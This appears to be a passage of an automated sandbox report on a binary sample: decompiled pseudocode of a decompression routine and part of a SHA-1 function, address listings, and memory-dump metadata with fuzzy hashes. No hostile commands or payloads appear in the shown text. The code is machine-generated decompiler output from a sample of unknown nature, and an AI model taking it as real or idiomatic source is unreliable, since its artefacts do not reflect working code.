          																				_t691 = _t691 + 0xc;
          																				_t529 = _t530 + 8;
          																				_t675 = _t675 + 8;
          																				_t496 = _t496 - 8;
          																				 *(_t691 + 0x1c) = _t529;
          																				_t657 = _t657 - 1;
          																				__eflags = _t657;
          																			} while (_t657 != 0);
          																			L84:
          																			_t654 =  *((intOrPtr*)(_t691 + 0x3c));
          																			goto L85;
          																		}
          																		__eflags = _t496 - 8;
          																		if(_t496 < 8) {
          																			goto L85;
          																		}
          																		_t628 = _t496 >> 3;
          																		__eflags = _t628;
          																		do {
          																			_t496 = _t496 - 8;
          																			 *_t529 =  *_t675;
          																			 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
          																			 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
          																			 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
          																			 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
          																			 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
          																			 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
          																			_t389 =  *((intOrPtr*)(_t675 + 7));
          																			_t675 = _t675 + 8;
          																			 *((char*)(_t529 + 7)) = _t389;
          																			_t529 = _t529 + 8;
          																			_t628 = _t628 - 1;
          																			__eflags = _t628;
          																		} while (_t628 != 0);
          																		goto L85;
          																	}
          																}
          																_t538 = _t654 + (_t359 + 0xb3e) * 4;
          																while(1) {
          																	__eflags = _t622 -  *_t538;
          																	if(_t622 <  *_t538) {
          																		break;
          																	}
          																	_t359 = _t359 + 1;
          																	_t538 = _t538 + 4;
          																	__eflags = _t359 - 0xf;
          																	if(_t359 < 0xf) {
          																		continue;
          																	}
          																	goto L130;
          																}
          																_t492 = _t359;
          																goto L130;
          															}
          															_t539 = 0x10;
          															_t629 = _t622 >> _t539 - _t358;
          															_t542 = ( *(_t629 + _t654 + 0x2d7c) & 0x000000ff) +  *(_t668 + 4);
          															 *_t668 =  *_t668 + (_t542 >> 3);
          															 *(_t668 + 4) = _t542 & 0x00000007;
          															_t363 =  *(_t654 + 0x317c + _t629 * 2) & 0x0000ffff;
          															goto L131;
          														} else {
          															goto L121;
          														}
          														do {
          															L121:
          															 *_t518 =  *(_t518 - 4);
          															_t518 = _t518 - 4;
          															_t620 = _t620 - 1;
          															__eflags = _t620;
          														} while (_t620 != 0);
          														goto L122;
          													}
          													_t498 =  *(_t663 + 0x74);
          													_t666 =  *((intOrPtr*)(_t691 + 0x14));
          													__eflags = _t498;
          													if(_t498 == 0) {
          														L23:
          														_t499 =  *((intOrPtr*)(_t691 + 0x10));
          														continue;
          													}
          													_t397 =  *(_t663 + 0x60);
          													_t630 =  *(_t663 + 0x7c);
          													_t677 = _t630 - _t397;
          													 *(_t691 + 0x1c) = _t397;
          													_t399 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
          													__eflags = _t677 - _t399;
          													if(_t677 >= _t399) {
          														L116:
          														_t347 = _t654 + 4;
          														__eflags = _t498;
          														if(_t498 == 0) {
          															goto L7;
          														}
          														_t658 =  *(_t663 + 0xe6dc);
          														do {
          															_t659 = _t658 & _t677;
          															_t677 = _t677 + 1;
          															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t659 +  *((intOrPtr*)(_t663 + 0x4b40))));
          															_t658 =  *(_t663 + 0xe6dc);
          															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t658;
          															_t498 = _t498 - 1;
          															__eflags = _t498;
          														} while (_t498 != 0);
          														goto L150;
          													}
          													__eflags = _t630 - _t399;
          													if(_t630 >= _t399) {
          														goto L116;
          													}
          													_t404 =  *((intOrPtr*)(_t663 + 0x4b40));
          													_t675 = _t677 + _t404;
          													_t529 = _t404 + _t630;
          													 *(_t691 + 0x24) = _t529;
          													 *(_t663 + 0x7c) = _t630 + _t498;
          													__eflags =  *(_t691 + 0x1c) - _t498;
          													if( *(_t691 + 0x1c) >= _t498) {
          														__eflags = _t498 - 8;
          														if(_t498 < 8) {
          															goto L85;
          														}
          														_t407 = _t498 >> 3;
          														__eflags = _t407;
          														_t660 = _t407;
          														do {
          															E0020EA80(_t529, _t675, 8);
          															_t545 =  *((intOrPtr*)(_t691 + 0x30));
          															_t691 = _t691 + 0xc;
          															_t529 = _t545 + 8;
          															_t675 = _t675 + 8;
          															_t498 = _t498 - 8;
          															 *(_t691 + 0x24) = _t529;
          															_t660 = _t660 - 1;
          															__eflags = _t660;
          														} while (_t660 != 0);
          														goto L84;
          													}
          													__eflags = _t498 - 8;
          													if(_t498 < 8) {
          														goto L85;
          													}
          													_t633 = _t498 >> 3;
          													__eflags = _t633;
          													do {
          														_t498 = _t498 - 8;
          														 *_t529 =  *_t675;
          														 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
          														 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
          														 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
          														 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
          														 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
          														 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
          														_t416 =  *((intOrPtr*)(_t675 + 7));
          														_t675 = _t675 + 8;
          														 *((char*)(_t529 + 7)) = _t416;
          														_t529 = _t529 + 8;
          														_t633 = _t633 - 1;
          														__eflags = _t633;
          													} while (_t633 != 0);
          													goto L85;
          												}
          												_push(_t691 + 0x28);
          												_t417 = E00203564(_t663, _t347);
          												__eflags = _t417;
          												if(_t417 == 0) {
          													goto L100;
          												}
          												_t420 = E00201A0E(_t663, _t691 + 0x28);
          												__eflags = _t420;
          												if(_t420 != 0) {
          													goto L33;
          												}
          												goto L100;
          											}
          											_t501 = _t619 - 0x106;
          											__eflags = _t501 - 8;
          											if(_t501 >= 8) {
          												_t680 = (_t501 >> 2) - 1;
          												_t501 = (_t501 & 0x00000003 | 0x00000004) << _t680;
          												__eflags = _t501;
          											} else {
          												_t680 = 0;
          											}
          											_t498 = _t501 + 2;
          											__eflags = _t680;
          											if(_t680 == 0) {
          												_t681 = _t654 + 4;
          											} else {
          												_t472 = E001FA4ED(_t347);
          												_t600 = 0x10;
          												_t498 = _t498 + (_t472 >> _t600 - _t680);
          												_t603 =  *(_t654 + 8) + _t680;
          												_t681 = _t654 + 4;
          												 *_t681 =  *_t681 + (_t603 >> 3);
          												 *(_t681 + 4) = _t603 & 0x00000007;
          											}
          											_t421 = E001FA4ED(_t681);
          											_t422 =  *(_t654 + 0xfa0);
          											_t635 = _t421 & 0x0000fffe;
          											__eflags = _t635 -  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4));
          											if(_t635 >=  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4))) {
          												_t682 = 0xf;
          												_t423 = _t422 + 1;
          												__eflags = _t423 - _t682;
          												if(_t423 >= _t682) {
          													L49:
          													_t552 =  *(_t654 + 8) + _t682;
          													 *(_t654 + 8) = _t552 & 0x00000007;
          													_t425 = _t552 >> 3;
          													 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + _t425;
          													_t554 = 0x10;
          													_t557 =  *((intOrPtr*)(_t654 + 0xf60 + _t682 * 4)) + (_t635 -  *((intOrPtr*)(_t654 + 0xf1c + _t682 * 4)) >> _t554 - _t682);
          													__eflags = _t557 -  *((intOrPtr*)(_t654 + 0xf1c));
          													asm("sbb eax, eax");
          													_t426 = _t425 & _t557;
          													__eflags = _t426;
          													_t427 =  *(_t654 + 0x1ba4 + _t426 * 2) & 0x0000ffff;
          													goto L50;
          												}
          												_t593 = _t654 + (_t423 + 0x3c8) * 4;
          												while(1) {
          													__eflags = _t635 -  *_t593;
          													if(_t635 <  *_t593) {
          														break;
          													}
          													_t423 = _t423 + 1;
          													_t593 = _t593 + 4;
          													__eflags = _t423 - 0xf;
          													if(_t423 < 0xf) {
          														continue;
          													}
          													goto L49;
          												}
          												_t682 = _t423;
          												goto L49;
          											} else {
          												_t594 = 0x10;
          												_t652 = _t635 >> _t594 - _t422;
          												_t597 = ( *(_t652 + _t654 + 0xfa4) & 0x000000ff) +  *(_t681 + 4);
          												 *_t681 =  *_t681 + (_t597 >> 3);
          												 *(_t681 + 4) = _t597 & 0x00000007;
          												_t427 =  *(_t654 + 0x13a4 + _t652 * 2) & 0x0000ffff;
          												L50:
          												_t638 = _t427 & 0x0000ffff;
          												__eflags = _t638 - 4;
          												if(_t638 >= 4) {
          													_t430 = (_t638 >> 1) - 1;
          													_t638 = (_t638 & 0x00000001 | 0x00000002) << _t430;
          													__eflags = _t638;
          												} else {
          													_t430 = 0;
          												}
          												 *(_t691 + 0x18) = _t430;
          												_t559 = _t638 + 1;
          												 *(_t691 + 0x24) = _t559;
          												_t683 = _t559;
          												 *(_t691 + 0x1c) = _t683;
          												__eflags = _t430;
          												if(_t430 == 0) {
          													L70:
          													__eflags = _t683 - 0x100;
          													if(_t683 > 0x100) {
          														_t498 = _t498 + 1;
          														__eflags = _t683 - 0x2000;
          														if(_t683 > 0x2000) {
          															_t498 = _t498 + 1;
          															__eflags = _t683 - 0x40000;
          															if(_t683 > 0x40000) {
          																_t498 = _t498 + 1;
          																__eflags = _t498;
          															}
          														}
          													}
          													 *(_t663 + 0x6c) =  *(_t663 + 0x68);
          													 *(_t663 + 0x68) =  *(_t663 + 0x64);
          													 *(_t663 + 0x64) =  *(_t663 + 0x60);
          													 *(_t663 + 0x60) = _t683;
          													_t641 =  *(_t663 + 0x7c);
          													_t561 = _t641 - _t683;
          													_t435 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
          													 *(_t663 + 0x74) = _t498;
          													 *(_t691 + 0x24) = _t561;
          													__eflags = _t561 - _t435;
          													if(_t561 >= _t435) {
          														L93:
          														_t666 =  *((intOrPtr*)(_t691 + 0x14));
          														_t347 = _t654 + 4;
          														__eflags = _t498;
          														if(_t498 == 0) {
          															goto L23;
          														}
          														_t684 =  *(_t663 + 0xe6dc);
          														_t661 =  *(_t691 + 0x24);
          														do {
          															_t685 = _t684 & _t661;
          															_t661 = _t661 + 1;
          															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)( *((intOrPtr*)(_t663 + 0x4b40)) + _t685));
          															_t684 =  *(_t663 + 0xe6dc);
          															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t684;
          															_t498 = _t498 - 1;
          															__eflags = _t498;
          														} while (_t498 != 0);
          														goto L150;
          													} else {
          														__eflags = _t641 - _t435;
          														if(_t641 >= _t435) {
          															goto L93;
          														}
          														_t440 =  *((intOrPtr*)(_t663 + 0x4b40));
          														_t675 = _t440 + _t561;
          														_t529 = _t440 + _t641;
          														 *(_t691 + 0x24) = _t529;
          														 *(_t663 + 0x7c) = _t641 + _t498;
          														__eflags =  *(_t691 + 0x1c) - _t498;
          														if( *(_t691 + 0x1c) >= _t498) {
          															__eflags = _t498 - 8;
          															if(_t498 < 8) {
          																goto L85;
          															}
          															_t443 = _t498 >> 3;
          															__eflags = _t443;
          															 *(_t691 + 0x1c) = _t443;
          															_t662 = _t443;
          															do {
          																E0020EA80(_t529, _t675, 8);
          																_t563 =  *((intOrPtr*)(_t691 + 0x30));
          																_t691 = _t691 + 0xc;
          																_t529 = _t563 + 8;
          																_t675 = _t675 + 8;
          																_t498 = _t498 - 8;
          																 *(_t691 + 0x24) = _t529;
          																_t662 = _t662 - 1;
          																__eflags = _t662;
          															} while (_t662 != 0);
          															goto L84;
          														}
          														__eflags = _t498 - 8;
          														if(_t498 < 8) {
          															goto L85;
          														}
          														_t644 = _t498 >> 3;
          														__eflags = _t644;
          														do {
          															_t498 = _t498 - 8;
          															 *_t529 =  *_t675;
          															 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
          															 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
          															 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
          															 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
          															 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
          															 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
          															_t452 =  *((intOrPtr*)(_t675 + 7));
          															_t675 = _t675 + 8;
          															 *((char*)(_t529 + 7)) = _t452;
          															_t529 = _t529 + 8;
          															_t644 = _t644 - 1;
          															__eflags = _t644;
          														} while (_t644 != 0);
          														goto L85;
          													}
          												} else {
          													__eflags = _t430 - 4;
          													if(__eflags < 0) {
          														_t453 = E00207D76(_t654 + 4);
          														_t565 = 0x20;
          														_t568 =  *(_t654 + 8) +  *(_t691 + 0x18);
          														_t683 = (_t453 >> _t565 -  *(_t691 + 0x18)) +  *(_t691 + 0x24);
          														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t568 >> 3);
          														_t569 = _t568 & 0x00000007;
          														__eflags = _t569;
          														 *(_t654 + 8) = _t569;
          														L69:
          														 *(_t691 + 0x1c) = _t683;
          														goto L70;
          													}
          													if(__eflags <= 0) {
          														_t645 = _t654 + 4;
          													} else {
          														_t467 = E00207D76(_t654 + 4);
          														_t651 =  *(_t691 + 0x18);
          														_t587 = 0x24;
          														_t590 = _t651 - 4 +  *(_t654 + 8);
          														_t645 = _t654 + 4;
          														_t683 = (_t467 >> _t587 - _t651 << 4) +  *(_t691 + 0x24);
          														 *_t645 =  *_t645 + (_t590 >> 3);
          														 *(_t645 + 4) = _t590 & 0x00000007;
          													}
          													_t456 = E001FA4ED(_t645);
          													_t457 =  *(_t654 + 0x1e8c);
          													_t647 = _t456 & 0x0000fffe;
          													__eflags = _t647 -  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4));
          													if(_t647 >=  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4))) {
          														_t571 = 0xf;
          														_t458 = _t457 + 1;
          														 *(_t691 + 0x18) = _t571;
          														__eflags = _t458 - _t571;
          														if(_t458 >= _t571) {
          															L66:
          															_t573 =  *(_t654 + 8) +  *(_t691 + 0x18);
          															 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t573 >> 3);
          															_t461 =  *(_t691 + 0x18);
          															 *(_t654 + 8) = _t573 & 0x00000007;
          															_t575 = 0x10;
          															_t578 =  *((intOrPtr*)(_t654 + 0x1e4c + _t461 * 4)) + (_t647 -  *((intOrPtr*)(_t654 + 0x1e08 + _t461 * 4)) >> _t575 - _t461);
          															__eflags = _t578 -  *((intOrPtr*)(_t654 + 0x1e08));
          															asm("sbb eax, eax");
          															_t462 = _t461 & _t578;
          															__eflags = _t462;
          															_t463 =  *(_t654 + 0x2a90 + _t462 * 2) & 0x0000ffff;
          															goto L67;
          														}
          														_t580 = _t654 + (_t458 + 0x783) * 4;
          														while(1) {
          															__eflags = _t647 -  *_t580;
          															if(_t647 <  *_t580) {
          																break;
          															}
          															_t458 = _t458 + 1;
          															_t580 = _t580 + 4;
          															__eflags = _t458 - 0xf;
          															if(_t458 < 0xf) {
          																continue;
          															}
          															goto L66;
          														}
          														 *(_t691 + 0x18) = _t458;
          														goto L66;
          													} else {
          														_t581 = 0x10;
          														_t650 = _t647 >> _t581 - _t457;
          														_t584 = ( *(_t650 + _t654 + 0x1e90) & 0x000000ff) +  *(_t654 + 8);
          														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t584 >> 3);
          														 *(_t654 + 8) = _t584 & 0x00000007;
          														_t463 =  *(_t654 + 0x2290 + _t650 * 2) & 0x0000ffff;
          														L67:
          														_t683 = _t683 + (_t463 & 0x0000ffff);
          														goto L69;
          													}
          												}
          											}
          										}
          										 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) = _t619;
          										_t69 = _t663 + 0x7c;
          										 *_t69 =  *(_t663 + 0x7c) + 1;
          										__eflags =  *_t69;
          										goto L33;
          									}
          									_t607 = _t654 + (_t353 + 0xd) * 4;
          									while(1) {
          										__eflags = _t616 -  *_t607;
          										if(_t616 <  *_t607) {
          											break;
          										}
          										_t353 = _t353 + 1;
          										_t607 = _t607 + 4;
          										__eflags = _t353 - 0xf;
          										if(_t353 < 0xf) {
          											continue;
          										}
          										goto L30;
          									}
          									_t490 = _t353;
          									goto L30;
          								}
          								_t608 = 0x10;
          								_t653 = _t616 >> _t608 - _t352;
          								_t611 = ( *(_t653 + _t654 + 0xb8) & 0x000000ff) +  *(_t667 + 4);
          								 *_t667 =  *_t667 + (_t611 >> 3);
          								_t347 = _t654 + 4;
          								 *(_t347 + 4) = _t611 & 0x00000007;
          								_t619 =  *(_t654 + 0x4b8 + _t653 * 2) & 0x0000ffff;
          								goto L31;
          							}
          							__eflags = _t507 -  *(_t663 + 0x7c);
          							if(_t507 ==  *(_t663 + 0x7c)) {
          								goto L21;
          							}
          							E002047DA(_t663);
          							__eflags =  *((intOrPtr*)(_t663 + 0x4c5c)) -  *((intOrPtr*)(_t663 + 0x4c4c));
          							if(__eflags > 0) {
          								L152:
          								_t418 = 0;
          								goto L101;
          							}
          							if(__eflags < 0) {
          								goto L21;
          							}
          							__eflags =  *((intOrPtr*)(_t663 + 0x4c58)) -  *((intOrPtr*)(_t663 + 0x4c48));
          							if( *((intOrPtr*)(_t663 + 0x4c58)) >  *((intOrPtr*)(_t663 + 0x4c48))) {
          								goto L152;
          							}
          							goto L21;
          						}
          					}
          				}
          				 *((char*)(_t654 + 0x2c)) = 1;
          				_push(_t654 + 0x30);
          				_push(_t654 + 0x18);
          				_push(_t654 + 4);
          				if(E0020397F(__ecx) != 0) {
          					goto L3;
          				}
          				goto L2;
          			}

          0x00000000
          0x00000000
          0x00207340
          0x00207346
          0x00207348
          0x0020734e
          0x00207352
          0x00207355
          0x00207359
          0x002073ab
          0x002073ae
          0x00000000
          0x00000000
          0x002073b6
          0x002073b6
          0x002073b9
          0x002073bb
          0x002073bf
          0x002073c4
          0x002073c8
          0x002073cb
          0x002073ce
          0x002073d1
          0x002073d4
          0x002073d8
          0x002073d8
          0x002073d8
          0x00000000
          0x002073dd
          0x0020735b
          0x0020735e
          0x00000000
          0x00000000
          0x00207366
          0x00207366
          0x00207369
          0x0020736c
          0x0020736f
          0x00207374
          0x0020737a
          0x00207380
          0x00207386
          0x0020738c
          0x00207392
          0x00207395
          0x00207398
          0x0020739b
          0x0020739e
          0x002073a1
          0x002073a1
          0x002073a1
          0x00000000
          0x002073a6
          0x002072cf
          0x002072d3
          0x002072d8
          0x002072da
          0x00000000
          0x00000000
          0x002072e3
          0x002072e8
          0x002072ea
          0x00000000
          0x00000000
          0x00000000
          0x002072ea
          0x00206eb1
          0x00206eb7
          0x00206eba
          0x00206ecb
          0x00206ece
          0x00206ece
          0x00206ebc
          0x00206ebc
          0x00206ebc
          0x00206ed0
          0x00206ed3
          0x00206ed5
          0x00206eff
          0x00206ed7
          0x00206ed9
          0x00206ee0
          0x00206ee8
          0x00206eea
          0x00206eec
          0x00206ef4
          0x00206efa
          0x00206efa
          0x00206f04
          0x00206f0b
          0x00206f11
          0x00206f17
          0x00206f1e
          0x00206f4c
          0x00206f4d
          0x00206f4e
          0x00206f50
          0x00206f6c
          0x00206f6f
          0x00206f76
          0x00206f79
          0x00206f7c
          0x00206f88
          0x00206f94
          0x00206f96
          0x00206f9c
          0x00206f9e
          0x00206f9e
          0x00206fa0
          0x00000000
          0x00206fa0
          0x00206f58
          0x00206f5b
          0x00206f5b
          0x00206f5d
          0x00000000
          0x00000000
          0x00206f5f
          0x00206f60
          0x00206f63
          0x00206f66
          0x00000000
          0x00000000
          0x00000000
          0x00206f68
          0x00206f6a
          0x00000000
          0x00206f20
          0x00206f22
          0x00206f25
          0x00206f2f
          0x00206f37
          0x00206f3d
          0x00206f40
          0x00206fa8
          0x00206fa8
          0x00206fab
          0x00206fae
          0x00206fbe
          0x00206fc1
          0x00206fc1
          0x00206fb0
          0x00206fb0
          0x00206fb0
          0x00206fc3
          0x00206fc7
          0x00206fca
          0x00206fce
          0x00206fd0
          0x00206fd4
          0x00206fd6
          0x00207107
          0x00207107
          0x0020710d
          0x0020710f
          0x00207110
          0x00207116
          0x00207118
          0x00207119
          0x0020711f
          0x00207121
          0x00207121
          0x00207121
          0x0020711f
          0x00207116
          0x00207125
          0x0020712b
          0x00207131
          0x00207134
          0x00207137
          0x00207142
          0x00207144
          0x00207149
          0x0020714c
          0x00207150
          0x00207152
          0x00207283
          0x00207283
          0x00207287
          0x0020728a
          0x0020728c
          0x00000000
          0x00000000
          0x00207292
          0x00207298
          0x0020729c
          0x002072a2
          0x002072a7
          0x002072ab
          0x002072b1
          0x002072ba
          0x002072bd
          0x002072bd
          0x002072bd
          0x00000000
          0x00207158
          0x00207158
          0x0020715a
          0x00000000
          0x00000000
          0x00207160
          0x00207166
          0x00207169
          0x0020716f
          0x00207173
          0x00207176
          0x0020717a
          0x002071c5
          0x002071c8
          0x00000000
          0x00000000
          0x002071cc
          0x002071cc
          0x002071cf
          0x002071d3
          0x002071d5
          0x002071d9
          0x002071de
          0x002071e2
          0x002071e5
          0x002071e8
          0x002071eb
          0x002071ee
          0x002071f2
          0x002071f2
          0x002071f2
          0x00000000
          0x002071d5
          0x0020717c
          0x0020717f
          0x00000000
          0x00000000
          0x00207183
          0x00207183
          0x00207186
          0x00207189
          0x0020718c
          0x00207191
          0x00207197
          0x0020719d
          0x002071a3
          0x002071a9
          0x002071af
          0x002071b2
          0x002071b5
          0x002071b8
          0x002071bb
          0x002071be
          0x002071be
          0x002071be
          0x00000000
          0x002071c3
          0x00206fdc
          0x00206fdc
          0x00206fdf
          0x002070da
          0x002070e3
          0x002070ed
          0x002070f1
          0x002070fa
          0x002070fd
          0x002070fd
          0x00207100
          0x00207103
          0x00207103
          0x00000000
          0x00207103
          0x00206fe5
          0x0020701b
          0x00206fe7
          0x00206fea
          0x00206fef
          0x00206ff7
          0x00206fff
          0x00207002
          0x0020700a
          0x00207011
          0x00207016
          0x00207016
          0x00207020
          0x00207027
          0x0020702d
          0x00207033
          0x0020703a
          0x00207068
          0x00207069
          0x0020706a
          0x0020706e
          0x00207070
          0x0020708e
          0x00207091
          0x0020709d
          0x002070a0
          0x002070a4
          0x002070a9
          0x002070bc
          0x002070be
          0x002070c4
          0x002070c6
          0x002070c6
          0x002070c8
          0x00000000
          0x002070c8
          0x00207078
          0x0020707b
          0x0020707b
          0x0020707d
          0x00000000
          0x00000000
          0x0020707f
          0x00207080
          0x00207083
          0x00207086
          0x00000000
          0x00000000
          0x00000000
          0x00207088
          0x0020708a
          0x00000000
          0x0020703c
          0x0020703e
          0x00207041
          0x0020704b
          0x00207053
          0x00207059
          0x0020705c
          0x002070d0
          0x002070d3
          0x00000000
          0x002070d3
          0x0020703a
          0x00206fd6
          0x00206f1e
          0x00206e97
          0x00206e9a
          0x00206e9a
          0x00206e9a
          0x00000000
          0x00206e9a
          0x00206e3b
          0x00206e3e
          0x00206e3e
          0x00206e40
          0x00000000
          0x00000000
          0x00206e42
          0x00206e43
          0x00206e46
          0x00206e49
          0x00000000
          0x00000000
          0x00000000
          0x00206e4b
          0x00206e4d
          0x00000000
          0x00206e4d
          0x00206dfc
          0x00206dff
          0x00206e09
          0x00206e11
          0x00206e17
          0x00206e1a
          0x00206e1d
          0x00000000
          0x00206e1d
          0x00206daa
          0x00206dad
          0x00000000
          0x00000000
          0x00206db1
          0x00206dbc
          0x00206dc2
          0x0020764b
          0x0020764b
          0x00000000
          0x0020764b
          0x00206dc8
          0x00000000
          0x00000000
          0x00206dd0
          0x00206dd6
          0x00000000
          0x00000000
          0x00000000
          0x00206dd6
          0x00206d52
          0x00206d1e
          0x00206cef
          0x00206cf3
          0x00206cf7
          0x00206cfb
          0x00206d03
          0x00000000
          0x00000000
          0x00000000

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
          • Instruction ID: 472c88f860fbb361eaccd5837eef92afe896613b9d9de78917d9b6c85ee76f46
          • Opcode Fuzzy Hash: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
          • Instruction Fuzzy Hash: 4A62E3706287869FC719CF28C8906A9FBE1BF55304F14866DD99A8B782D331F975CB80
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 70%
          			E001FE973(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
          				signed int _v4;
          				signed int _v8;
          				signed int _v12;
          				signed int _v16;
          				signed int* _v20;
          				signed int _v24;
          				signed int _v28;
          				signed int _t429;
          				intOrPtr _t431;
          				intOrPtr _t436;
          				void* _t441;
          				intOrPtr _t443;
          				signed int _t446;
          				void* _t448;
          				signed int _t454;
          				signed int _t460;
          				signed int _t466;
          				signed int _t474;
          				signed int _t482;
          				signed int _t489;
          				signed int _t512;
          				signed int _t519;
          				signed int _t526;
          				signed int _t546;
          				signed int _t555;
          				signed int _t564;
          				signed int* _t592;
          				signed int _t593;
          				signed int _t595;
          				signed int _t596;
          				signed int* _t597;
          				signed int _t598;
          				signed int _t599;
          				signed int _t601;
          				signed int _t603;
          				signed int _t604;
          				signed int* _t605;
          				signed int _t606;
          				signed int* _t670;
          				signed int* _t741;
          				signed int _t752;
          				signed int _t769;
          				signed int _t773;
          				signed int _t777;
          				signed int _t781;
          				signed int _t782;
          				signed int _t786;
          				signed int _t787;
          				signed int _t791;
          				signed int _t796;
          				signed int _t800;
          				signed int _t804;
          				signed int _t806;
          				signed int _t809;
          				signed int _t810;
          				signed int* _t811;
          				signed int _t814;
          				signed int _t815;
          				signed int _t816;
          				signed int _t820;
          				signed int _t821;
          				signed int _t825;
          				signed int _t830;
          				signed int _t834;
          				signed int _t838;
          				signed int* _t839;
          				signed int _t841;
          				signed int _t842;
          				signed int _t844;
          				signed int _t845;
          				signed int _t847;
          				signed int* _t848;
          				signed int _t851;
          				signed int* _t854;
          				signed int _t855;
          				signed int _t857;
          				signed int _t858;
          				signed int _t862;
          				signed int _t863;
          				signed int _t867;
          				signed int _t871;
          				signed int _t875;
          				signed int _t879;
          				signed int _t880;
          				signed int* _t881;
          				signed int _t882;
          				signed int _t884;
          				signed int _t885;
          				signed int _t886;
          				signed int _t887;
          				signed int _t888;
          				signed int _t890;
          				signed int _t891;
          				signed int _t893;
          				signed int _t894;
          				signed int _t896;
          				signed int _t897;
          				signed int* _t898;
          				signed int _t899;
          				signed int _t901;
          				signed int _t902;
          				signed int _t904;
          				signed int _t905;
          
          				_t906 =  &_v28;
          				if(_a16 == 0) {
          					_t839 = _a8;
          					_v20 = _t839;
          					E0020EA80(_t839, _a12, 0x40);
          					_t906 =  &(( &_v28)[3]);
          				} else {
          					_t839 = _a12;
          					_v20 = _t839;
          				}
          				_t848 = _a4;
          				_t593 =  *_t848;
          				_t886 = _t848[1];
          				_a12 = _t848[2];
          				_a16 = _t848[3];
          				_v24 = 0;
          				_t429 = E00215604( *_t839);
          				asm("rol edx, 0x5");
          				 *_t839 = _t429;
          				_t851 = _t848[4] + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t429;
          				_t430 = _t839;
          				asm("ror ebp, 0x2");
          				_v16 = _t839;
          				_a8 =  &(_t839[3]);
          				do {
          					_t431 = E00215604(_t430[1]);
          					asm("rol edx, 0x5");
          					 *((intOrPtr*)(_v16 + 4)) = _t431;
          					asm("ror ebx, 0x2");
          					_a16 = _a16 + 0x5a827999 + ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t431;
          					_t436 = E00215604( *((intOrPtr*)(_a8 - 4)));
          					asm("rol edx, 0x5");
          					 *((intOrPtr*)(_a8 - 4)) = _t436;
          					asm("ror esi, 0x2");
          					_a12 = _a12 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _a16 + _t436;
          					_t441 = E00215604( *_a8);
          					asm("rol edx, 0x5");
          					 *_a8 = _t441;
          					asm("ror dword [esp+0x48], 0x2");
          					_t886 = _t886 + ((_t851 ^ _t593) & _a16 ^ _t593) + _a12 + 0x5a827999 + _t441;
          					_t443 = E00215604( *((intOrPtr*)(_a8 + 4)));
          					_a8 = _a8 + 0x14;
          					asm("rol edx, 0x5");
          					 *((intOrPtr*)(_a8 + 4)) = _t443;
          					_t446 = _v24 + 5;
          					asm("ror dword [esp+0x48], 0x2");
          					_v24 = _t446;
          					_t593 = _t593 + ((_t851 ^ _a16) & _a12 ^ _t851) + _t886 + _t443 + 0x5a827999;
          					_v16 =  &(_t839[_t446]);
          					_t448 = E00215604(_t839[_t446]);
          					_t906 =  &(_t906[5]);
          					asm("rol edx, 0x5");
          					 *_v16 = _t448;
          					_t430 = _v16;
          					asm("ror ebp, 0x2");
          					_t851 = _t851 + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t448;
